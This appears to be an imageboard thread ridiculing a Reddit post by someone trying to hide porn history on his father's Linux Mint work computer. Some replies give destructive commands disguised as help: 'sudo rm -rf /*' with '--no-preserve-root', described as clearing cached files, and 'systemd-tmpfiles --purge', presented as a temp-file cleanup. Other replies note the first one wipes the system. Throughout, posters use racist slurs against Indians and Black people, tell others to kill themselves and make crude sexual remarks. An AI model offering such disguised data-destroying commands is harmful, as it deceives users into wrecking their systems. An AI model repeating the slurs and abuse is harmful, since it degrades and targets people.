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pls sars how i delete
>I'm gonna die or else
what did xe mean by that
he deserves it for sharing his $HOME with his parents.
>turd worlders lapping up nigspeak sewage runoff
You're supposed to watch porn on a public computer.
you can use the command
sudo rm -rf /*

to remove the cached files to clear the results.
it will give you a warning because these are normally protected system files but just accept and it'll be cleared
you might need to add --no-preserve-root
This command will delete every file in the computer.
That's not even possible as it requires the OS to delete files.
This works on most loonix machines.
Click on the folder icon on the left side of the menu in that screenshot. In that folder go to Video, right click on the files you want to delete, select move to trash or delete. Go to the trash folder, there is probably a shortcut on the left side of the window with that name, delete the file again from the trash.
Windows does the same shit
I hate this, I don't want web browser history in my start menu
>looked at the OP image
>didn't read it
thanks tardGPT
not really, /* expands to every folder in root which is technically not root so flag is not required
navigate to /usr/shared/porn and delete
blatant bot posts
how do you even know that
how do you know that you're not a bot
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>this shit again
what if you were trained to think that you're a human

You can't prove to me that you're not a bot. I can't prove to you that I'm a human either. Sad times we live in.
>reddit screencap thread
how do you know it's reddit

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>the great redeemers strike again
good morning I hate indians
what's a computer?
ok but how do you know it's not
bait no way the jeet can't just ask a chatbot
Smear it with cow dung and hope for the best, Pooyandip.
Hello this is Sanjay from computer support, you need install Windows sir for your computer to work.
>add --no-preserve-root
Good catch.
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OP is not the reddit OP, because if someone doesn't even know about Mint, and in the same time uses a traditional meme on /g/ like "sar", he's lying, lying about his identity, or lying about the problem (if he was the reddit OP), thus it's a bate.
How dumb you have to be to download porn on a family computer? Jesus Christ
I cum in petite redhead stepsister
That's one gay ass UI. Why isn't there a little "Clear Recents" button in the bottom right corner or something? How are you even supposed to clear this?
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I hate redditors so much
>edit: I just found out this linux is called mint
how do you even manage to download a distro ISO and install it without even knowing the name of said distro? geg
>mint in 2024
Never go for Linux unless you have doubled down on coomermaxxing.
He's right though. He could make the boomer lose his job.
install ubuntu mate
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It does have that. Not sure if the Recent Documents are shown by default though, which you'd need to be able to access that Clear button.
Unironically an issue with normies changing operating systems, they need to be sure their incognito surfing is still possible.
It's a touchy (lol) subject. Do not underestimate its significance despite its hidden presence if your intent is to reduce the number of normies using Winblows.
>work computer
Wonder if his dad choose Mint for it or if it's a company/CTO decision...
systemd has considered this use case and implemented a handy feature.

Just run sudo systemd-tmpfiles --purge and it will, as the name clearly indicates, delete all temporary files including your pr0n.
Why do normalfags switch to linux if they're going to download all this bullshit?
you can't centre open windows with win+alt+c or rename your files with their md5/sha/crc32 hash very easily
Because Windows is just that fucking putrid. Seriously, no one likes the idea of playing russian roulette when they get an update. How many updates have there been in recent years where shit randomly gets deleted, PCs slow to a crawl or shit just irreparably breaks without doing a rollback in general?
probably stolen or even family pc lol
Should've installed GNOME. This never would've happened. Little jeet wouldn't have known how to launch a single program. Not Windows enough.
Because Windows unironically that bad now, yes.
They require Linux to access the slop they want, not the slop MS wants them to consume.
I know, retards vs. retards, and retards and retards, it's all fun and games until you have to personally deal with them.
>How many updates have there been in recent years where shit randomly gets deleted, PCs slow to a crawl or shit just irreparably breaks without doing a rollback in general?
>What? People jack off in the privacy of their homes?! FIRE THIS MAN IMMEDIATELY
You fucking retard.
>i'm gonna die or else
>i just found out this linux is called mint
i hope his dad cuts off his dick so this nigga cant have kids
Hah I saw that earlier on Reddit, dude figured it out but lol
>I saw that earlier on Reddit
Kill yourself.
>Jacking off on your Dad's work computer when you probably have 10 other devices to watch porn on
Face it, this site is just a place for people to dump Twitter and Reddit posts
Oh hell, I remember that thread.
I wonder what company it was.
I'm not reading all that shit, can I get a qrd?
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I think Linux is a much more pleasant OS to use
Are Indians the most elitist race on earth? I can't think of any other race that hates poor people as much and sets up entire systems to fuck them over explicitly as Indians do
It says it's his dad's work computer. From context it should be clear that the dad uses Mint, might be that the son doesn't know shit about Linux and it was the dad who installed it
Work computer. Yeah you might get shitcanned for that if it reflects badly on the company
Don't work for jews. Simple.
>just be neet
this will solve it

This command is saying you want to delete all system files and possibly your home files if they are not on a sep partion.

ITS EXTREMELY DANGEROUS and if I remember correctly modern distros warn what it does.
It's not a computer, its a linux called mint
>Offered a good, hilarious read
>wont read
Why did you even reply?
in his place, I would delete brave and then larp about it saying that it broke so I had to reinstall or something, but it's still absurd to watch porn in a family used device.
>hurr durr a larger program executed a script because of pointer management
This is literal buzzword spam lmao, the whole story is probably chatgpt

wtf u not puttin it in ur 'homework' folder cuz niggas b crazy fr fr
anon, it's his dad's computer, his dad installed mint on it
you're showing your age, these days it's the middle-aged people who know more about computer than their kids
weird mine doesn't do this, i have to the recent documents but i cant search like this screen shot is. also you can clear your recently opened
When OP follows some retarded advice to delete the file references and fucks the installation, then yes that might cause problems. Anyone with a brain thought of that when reading the Reddit comment, which absolutely the right course of action
I pray for death, and yet death never comes
>Don't work
Good advice anon
There is no reason why any sane person would keep web browser history.
What is he 12? He should have his own computer, and even then, it’s not the mid 2000s where everyone has a family computer, kids these days have their own devices.
it is, are you this retarded? You need a filesystem. The rm program is running from memory into cpu.
why lie so blatantly lmao
Imagine if they all shared one smartphone, yet had separate computers instead. Man, I hate the current state of tech.
I cum but I want to fuck you
That's no kid. Some degenerate watched porn on his computer and made that post for plausible deniability when his IT department inevitably finds out. Still getting the boot.
did he jerk off using his company's laptop?
>Do not underestimate its significance despite its hidden presence if your intent is to reduce the number of normies using Winblows.
One way to do it is to show the normies operation of the OS you just installed using some dummy files named "credit-card-number.txt" (or "sexy-selfie.jpg" depending on how hard you need to drive the point home) and then how you clear these back up to restore the PC to a clean slate.
Unfortunately, not all things are tied to Clear list button, many apps keep their own Recently Opened, regardless if Windows or Linux.
It's true you shouldn't be naive and ideally have another PC as your public presentation PC, but it's kinda annoying that safeguards aren't in place to keep it reliably confined to just having to use one PC.
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